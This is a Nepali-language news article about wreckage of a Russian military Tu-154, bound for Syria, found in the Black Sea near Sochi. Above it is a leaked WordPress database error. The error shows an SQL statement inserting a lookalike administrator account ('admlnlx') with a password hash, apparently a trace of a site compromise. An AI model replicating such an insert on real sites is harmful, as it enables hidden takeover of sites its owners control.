WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJrCwxlYaJInLEVXZhD9JdyS3cqgOl/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 15:04:18', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस १०-
९१ यात्रु सवार एउटा रुसी सेनाको विमानको भग्नावेशष ‘ब्ल्याक सी’ मा भेटिएको रुसका सञ्चारमाध्यमहरुले जनाएका छन्।सोचीस्थित विमानस्थलबाट उडेको केही समयपछि नै उक्त विमानको राडरसँग सम्पर्कविच्छेद भएको थियो।
रुसको रक्षा मन्त्रालयले हराइरहेको टियू-१५४ विमानमा सेनाका अधिकारीहरु, उनीहरुको सांगितिक समूह, केही पत्रकारलगायत अन्य भएको जनाएको छ।खबरहरुका अनुसार उक्त विमान सिरियाका लाटाकिया प्रान्तका लागि उडेको थियो।
खोजीका क्रममा विमानका भग्नावशेषहरु सोचीस्थित रिसोर्ट नजिकैको ब्ल्याक सीमा भेटिएको बताइएको छ।सेनाका प्रवक्ताले सिरियामा खटिएका रुसी सेनाको फौजले आयोजना गरेको नयाँ वर्षको कार्यक्रमका लागि सांगितिक समूह विमानबाट सिरियाको लाटाकिया प्रान्त जाँदै थियो।
इन्टरफ्याक्स समाचार संस्थाले मन्त्रालयलाई उद्धृत गर्दै स्थानीय समय अनुसार ५ बजेर २० मिनेट जाँदा उडेको विमान २० मिनेटपछि राडरसँगको सम्पर्कबाट बाहिर गएको बताएको छ।